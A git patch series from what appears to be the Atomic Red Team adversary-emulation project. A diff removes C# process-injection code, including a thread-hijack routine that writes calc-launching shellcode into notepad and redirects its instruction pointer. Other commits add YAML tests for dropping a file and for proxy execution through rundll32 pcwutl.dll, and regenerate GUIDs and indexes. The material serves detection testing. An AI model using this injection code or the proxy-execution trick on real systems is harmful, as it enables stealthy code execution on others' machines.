Architecture; - public IMAGE_DATA_DIRECTORY GlobalPtr; - public IMAGE_DATA_DIRECTORY TLSTable; - public IMAGE_DATA_DIRECTORY LoadConfigTable; - public IMAGE_DATA_DIRECTORY BoundImport; - public IMAGE_DATA_DIRECTORY IAT; - public IMAGE_DATA_DIRECTORY DelayImportDescriptor; - public IMAGE_DATA_DIRECTORY CLRRuntimeHeader; - public IMAGE_DATA_DIRECTORY Reserved; - } - - [StructLayout(LayoutKind.Sequential, Pack = 1)] - public struct IMAGE_OPTIONAL_HEADER64 - { - public UInt16 Magic; - public Byte MajorLinkerVersion; - public Byte MinorLinkerVersion; - public UInt32 SizeOfCode; - public UInt32 SizeOfInitializedData; - public UInt32 SizeOfUninitializedData; - public UInt32 AddressOfEntryPoint; - public UInt32 BaseOfCode; - public UInt64 ImageBase; - public UInt32 SectionAlignment; - public UInt32 FileAlignment; - public UInt16 MajorOperatingSystemVersion; - public UInt16 MinorOperatingSystemVersion; - public UInt16 MajorImageVersion; - public UInt16 MinorImageVersion; - public UInt16 MajorSubsystemVersion; - public UInt16 MinorSubsystemVersion; - public UInt32 Win32VersionValue; - public UInt32 SizeOfImage; - public UInt32 SizeOfHeaders; - public UInt32 CheckSum; - public UInt16 Subsystem; - public UInt16 DllCharacteristics; - public UInt64 SizeOfStackReserve; - public UInt64 SizeOfStackCommit; - public UInt64 SizeOfHeapReserve; - public UInt64 SizeOfHeapCommit; - public UInt32 LoaderFlags; - public UInt32 NumberOfRvaAndSizes; - - public IMAGE_DATA_DIRECTORY ExportTable; - public IMAGE_DATA_DIRECTORY ImportTable; - public IMAGE_DATA_DIRECTORY ResourceTable; - public IMAGE_DATA_DIRECTORY ExceptionTable; - public IMAGE_DATA_DIRECTORY CertificateTable; - public IMAGE_DATA_DIRECTORY BaseRelocationTable; - public IMAGE_DATA_DIRECTORY Debug; - public IMAGE_DATA_DIRECTORY Architecture; - public IMAGE_DATA_DIRECTORY GlobalPtr; - public IMAGE_DATA_DIRECTORY TLSTable; - public IMAGE_DATA_DIRECTORY LoadConfigTable; - public IMAGE_DATA_DIRECTORY BoundImport; - public IMAGE_DATA_DIRECTORY IAT; - public IMAGE_DATA_DIRECTORY DelayImportDescriptor; - public IMAGE_DATA_DIRECTORY CLRRuntimeHeader; - public IMAGE_DATA_DIRECTORY Reserved; - } - - [StructLayout(LayoutKind.Sequential, Pack = 1)] - public struct IMAGE_FILE_HEADER - { - public UInt16 Machine; - public UInt16 NumberOfSections; - public UInt32 TimeDateStamp; - public UInt32 PointerToSymbolTable; - public UInt32 NumberOfSymbols; - public UInt16 SizeOfOptionalHeader; - public UInt16 Characteristics; - } - - [StructLayout(LayoutKind.Explicit)] - public struct IMAGE_SECTION_HEADER - { - [FieldOffset(0)] - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] - public char[] Name; - [FieldOffset(8)] - public UInt32 VirtualSize; - [FieldOffset(12)] - public UInt32 VirtualAddress; - [FieldOffset(16)] - public UInt32 SizeOfRawData; - [FieldOffset(20)] - public UInt32 PointerToRawData; - [FieldOffset(24)] - public UInt32 PointerToRelocations; - [FieldOffset(28)] - public UInt32 PointerToLinenumbers; - [FieldOffset(32)] - public UInt16 NumberOfRelocations; - [FieldOffset(34)] - public UInt16 NumberOfLinenumbers; - [FieldOffset(36)] - public DataSectionFlags Characteristics; - - public string Section - { - get { return new string(Name); } - } - } - - [StructLayout(LayoutKind.Sequential)] - public struct IMAGE_IMPORT_DESCRIPTOR - { - public uint OriginalFirstThunk; - public uint TimeDateStamp; - public uint ForwarderChain; - public uint Name; - public uint FirstThunk; - } - - [StructLayout(LayoutKind.Sequential)] - public struct IMAGE_BASE_RELOCATION - { - public uint VirtualAdress; - public uint SizeOfBlock; - } - - [Flags] - public enum DataSectionFlags : uint - { - - Stub = 0x00000000, - - } - - public static T FromBinaryReader(BinaryReader reader) - { - // Read in a byte array - byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T))); - - // Pin the managed memory while, copy it out the data, then unpin it - GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned); - T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T)); - handle.Free(); - - return theStructure; - } - - - public static bool Is32BitHeader(IMAGE_FILE_HEADER fileHeader) - { - UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100; - return (IMAGE_FILE_32BIT_MACHINE & fileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE; - } - - - // Process privileges - public const int PROCESS_CREATE_THREAD = 0x0002; - public const int PROCESS_QUERY_INFORMATION = 0x0400; - public const int PROCESS_VM_OPERATION = 0x0008; - public const int PROCESS_VM_WRITE = 0x0020; - public const int PROCESS_VM_READ = 0x0010; - public const int PROCESS_ALL_ACCESS = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ; - - // Memory permissions - public const uint MEM_COMMIT = 0x00001000; - public const uint MEM_RESERVE = 0x00002000; - public const uint PAGE_READWRITE = 0x04; - public const uint PAGE_EXECUTE_READWRITE = 0x40; - - - [DllImport("kernel32.dll")] - public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); - - [DllImport("kernel32.dll")] - public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect); - - [DllImport("kernel32.dll")] - public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); - - [DllImport("kernel32.dll")] - public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); - - [DllImport("kernel32.dll")] - public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead); - - [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] - public static extern IntPtr LoadLibrary(string lpFileName); - - [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] - public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); - -} - -public class ThreadHijack -{ - // Import API Functions - [DllImport("kernel32.dll")] - public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); - - [DllImport("kernel32.dll")] - static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId); - - [DllImport("kernel32.dll")] - static extern uint SuspendThread(IntPtr hThread); - - [DllImport("kernel32.dll", SetLastError = true)] - static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext); - - [DllImport("kernel32.dll", SetLastError = true)] - static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext); - - [DllImport("kernel32.dll")] - static extern int ResumeThread(IntPtr hThread); - - [DllImport("kernel32", CharSet = CharSet.Auto,SetLastError = true)] - static extern bool CloseHandle(IntPtr handle); - - [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] - static extern IntPtr GetProcAddress(IntPtr hModule, string procName); - - [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] - static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect); - - [DllImport("kernel32.dll", SetLastError = true)] - static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); - - [DllImport("kernel32.dll")] - static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead); - - - // Process privileges - const int PROCESS_CREATE_THREAD = 0x0002; - const int PROCESS_QUERY_INFORMATION = 0x0400; - const int PROCESS_VM_OPERATION = 0x0008; - const int PROCESS_VM_WRITE = 0x0020; - const int PROCESS_VM_READ = 0x0010; - - // Memory permissions - const uint MEM_COMMIT = 0x00001000; - const uint MEM_RESERVE = 0x00002000; - const uint PAGE_READWRITE = 4; - const uint PAGE_EXECUTE_READWRITE = 0x40; - - [Flags] - public enum ThreadAccess : int - { - TERMINATE = (0x0001), - SUSPEND_RESUME = (0x0002), - GET_CONTEXT = (0x0008), - SET_CONTEXT = (0x0010), - SET_INFORMATION = (0x0020), - QUERY_INFORMATION = (0x0040), - SET_THREAD_TOKEN = (0x0080), - IMPERSONATE = (0x0100), - DIRECT_IMPERSONATION = (0x0200), - THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT, - THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION - } - - public enum CONTEXT_FLAGS : uint - { - CONTEXT_i386 = 0x10000, - CONTEXT_i486 = 0x10000, // same as i386 - CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP - CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI - CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS - CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state - CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7 - CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions - CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS, - CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS - } - - // x86 float save - [StructLayout(LayoutKind.Sequential)] - public struct FLOATING_SAVE_AREA - { - public uint ControlWord; - public uint StatusWord; - public uint TagWord; - public uint ErrorOffset; - public uint ErrorSelector; - public uint DataOffset; - public uint DataSelector; - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] - public byte[] RegisterArea; - public uint Cr0NpxState; - } - - // x86 context structure (not used in this example) - [StructLayout(LayoutKind.Sequential)] - public struct CONTEXT - { - public uint ContextFlags; //set this to an appropriate value - // Retrieved by CONTEXT_DEBUG_REGISTERS - public uint Dr0; - public uint Dr1; - public uint Dr2; - public uint Dr3; - public uint Dr6; - public uint Dr7; - // Retrieved by CONTEXT_FLOATING_POINT - public FLOATING_SAVE_AREA FloatSave; - // Retrieved by CONTEXT_SEGMENTS - public uint SegGs; - public uint SegFs; - public uint SegEs; - public uint SegDs; - // Retrieved by CONTEXT_INTEGER - public uint Edi; - public uint Esi; - public uint Ebx; - public uint Edx; - public uint Ecx; - public uint Eax; - // Retrieved by CONTEXT_CONTROL - public uint Ebp; - public uint Eip; - public uint SegCs; - public uint EFlags; - public uint Esp; - public uint SegSs; - // Retrieved by CONTEXT_EXTENDED_REGISTERS - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] - public byte[] ExtendedRegisters; - } - - // x64 m128a - [StructLayout(LayoutKind.Sequential)] - public struct M128A - { - public ulong High; - public long Low; - - public override string ToString() - { - return string.Format("High:{0}, Low:{1}", this.High, this.Low); - } - } - - // x64 save format - [StructLayout(LayoutKind.Sequential, Pack = 16)] - public struct XSAVE_FORMAT64 - { - public ushort ControlWord; - public ushort StatusWord; - public byte TagWord; - public byte Reserved1; - public ushort ErrorOpcode; - public uint ErrorOffset; - public ushort ErrorSelector; - public ushort Reserved2; - public uint DataOffset; - public ushort DataSelector; - public ushort Reserved3; - public uint MxCsr; - public uint MxCsr_Mask; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] - public M128A[] FloatRegisters; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] - public M128A[] XmmRegisters; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)] - public byte[] Reserved4; - } - - // x64 context structure - [StructLayout(LayoutKind.Sequential, Pack = 16)] - public struct CONTEXT64 - { - public ulong P1Home; - public ulong P2Home; - public ulong P3Home; - public ulong P4Home; - public ulong P5Home; - public ulong P6Home; - - public CONTEXT_FLAGS ContextFlags; - public uint MxCsr; - - public ushort SegCs; - public ushort SegDs; - public ushort SegEs; - public ushort SegFs; - public ushort SegGs; - public ushort SegSs; - public uint EFlags; - - public ulong Dr0; - public ulong Dr1; - public ulong Dr2; - public ulong Dr3; - public ulong Dr6; - public ulong Dr7; - - public ulong Rax; - public ulong Rcx; - public ulong Rdx; - public ulong Rbx; - public ulong Rsp; - public ulong Rbp; - public ulong Rsi; - public ulong Rdi; - public ulong R8; - public ulong R9; - public ulong R10; - public ulong R11; - public ulong R12; - public ulong R13; - public ulong R14; - public ulong R15; - public ulong Rip; - - public XSAVE_FORMAT64 DUMMYUNIONNAME; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)] - public M128A[] VectorRegister; - public ulong VectorControl; - - public ulong DebugControl; - public ulong LastBranchToRip; - public ulong LastBranchFromRip; - public ulong LastExceptionToRip; - public ulong LastExceptionFromRip; - } - - public static int Inject() - { - // Get target process by name - - Process targetProcess = Process.GetProcessesByName("notepad")[0]; - - - // Open and Suspend first thread - ProcessThread pT = targetProcess.Threads[0]; - - IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id); - SuspendThread(pOpenThread); - - // Get thread context - CONTEXT64 tContext = new CONTEXT64(); - tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL; - if (GetThreadContext(pOpenThread, ref tContext)) - { - - } - - // WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode - // Compiled with: - // nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin - byte[] payload = new byte[112] { - 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3 - }; - - // Once shellcode has executed return to thread original EIP address (mov to rax then jmp to address) - byte[] mov_rax = new byte[2] { - 0x48, 0xb8 - }; - byte[] jmp_address = BitConverter.GetBytes(tContext.Rip); - byte[] jmp_rax = new byte[2] { - 0xff, 0xe0 - }; - - // Build shellcode - byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length]; - payload.CopyTo(shellcode, 0); - mov_rax.CopyTo(shellcode, payload.Length); - jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length); - jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length); - - // OpenProcess to allocate memory - IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); - - // Allocate memory for shellcode within process - IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - - // Write shellcode within process - UIntPtr bytesWritten; - bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); - - // Read memory to view shellcode - int bytesRead = 0; - byte[] buffer = new byte[shellcode.Length]; - ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead); - - // Set context EIP to location of shellcode - tContext.Rip=(ulong)allocMemAddress.ToInt64(); - - // Apply new context to suspended thread - if(!SetThreadContext(pOpenThread, ref tContext)) - { - - } - if (GetThreadContext(pOpenThread, ref tContext)) - { - - } - // Resume the thread, redirecting execution to shellcode, then back to original process - - ResumeThread(pOpenThread); - - return 0; - } -} - -public class Program -{ - public static void Main() - { - //Test One: - Console.WriteLine("{0}", "#1 ProcessInject"); - ProcessInject.Inject(); - Console.WriteLine("{0}", "ProcessInject Complete"); - //Test Two: - Console.WriteLine("{0}", "#2 ApcInjectionAnyProcess"); - ApcInjectionAnyProcess.Inject(); - Console.WriteLine("{0}", "ApcInjectionAnyProcess Complete"); - //Test Three: - Console.WriteLine("{0}", "#3 ApcInjectionNewProcess"); - ApcInjectionNewProcess.Inject(); - Console.WriteLine("{0}", "ApcInjectionNewProcess Complete"); - //Test Four: - Console.WriteLine("{0}", "#4 IatInjection"); - IatInjection.Inject(); - Console.WriteLine("{0}", "IatInjection Complete"); - //Test Five: - Console.WriteLine("{0}", "#5 ThreadHijack"); - ThreadHijack.Inject(); - Console.WriteLine("{0}", "ThreadHijack Complete "); - - } - -} diff --git a/atomics/T1055/src/x64/T1055-macrocode.txt b/atomics/T1055/src/x64/T1055-macrocode.txt old mode 100644 new mode 100755 diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 6f1466e53e..f02cda77d8 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -31,3 +31,23 @@ atomic_tests: cleanup_command: | Remove-Item #{script_path} -Force -ErrorAction Ignore name: powershell +- name: Writes text to a file and displays it. + description: | + Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. + supported_platforms: + - windows + input_arguments: + file_contents_path: + description: Path to the file that the command prompt will drop. + type: path + default: '%TEMP%\test.bin' + message: + description: Message that will be written to disk and then displayed. + type: string + default: 'Hello from the Windows Command Prompt!' + executor: + command: | + echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" + cleanup_command: | + del "#{file_contents_path}" + name: command_prompt diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 9ecbd14597..1ca8e29188 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -155,4 +155,19 @@ atomic_tests: command: | rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs + name: command_prompt + +- name: Launches an executable using Rundll32 and pcwutl.dll + description: | + Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. + supported_platforms: + - windows + input_arguments: + exe_to_launch: + description: Path of the executable to launch + type: path + default: '%windir%\System32\notepad.exe' + executor: + command: | + rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} name: command_prompt \ No newline at end of file From 4803288632d94f23aa9e32be92c70160726e8a34 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Sat, 13 Mar 2021 14:24:31 +0000 Subject: [PATCH 4/7] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1059.003/T1059.003.yaml | 1 + atomics/T1218.011/T1218.011.yaml | 1 + atomics/used_guids.txt | 2 ++ 3 files changed, 4 insertions(+) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index f02cda77d8..cbe28a3f9b 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -32,6 +32,7 @@ atomic_tests: Remove-Item #{script_path} -Force -ErrorAction Ignore name: powershell - name: Writes text to a file and displays it. + auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: | Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. supported_platforms: diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 1ca8e29188..5289ed4f05 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -158,6 +158,7 @@ atomic_tests: name: command_prompt - name: Launches an executable using Rundll32 and pcwutl.dll + auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 description: | Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 2d62cd2ed0..10a681e80f 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -663,3 +663,5 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 7a91ad51-e6d2-4d43-9471-f26362f5738e 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 9c6bdb34-a89f-4b90-acb1-5970614c711b +127b4afe-2346-4192-815c-69042bec570e +9f5d081a-ee5a-42f9-a04e-b7bdc487e676 From 396ea73b70e1574eef1a99ef6601db1683ec3f97 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sat, 13 Mar 2021 14:24:38 +0000 Subject: [PATCH 5/7] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 14 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 14 +- atomics/Indexes/Indexes-Markdown/index.md | 18 +- .../Indexes/Indexes-Markdown/windows-index.md | 18 +- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/Matrices/windows-matrix.md | 4 +- atomics/Indexes/index.yaml | 189 +++++++++++------- atomics/T1055.001/T1055.001.md | 62 ++++++ atomics/T1055/T1055.md | 57 +----- atomics/T1059.003/T1059.003.md | 36 ++++ atomics/T1218.011/T1218.011.md | 31 +++ 13 files changed, 292 insertions(+), 159 deletions(-) create mode 100644 atomics/T1055.001/T1055.001.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 68c3819223..0e8c068e0f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"t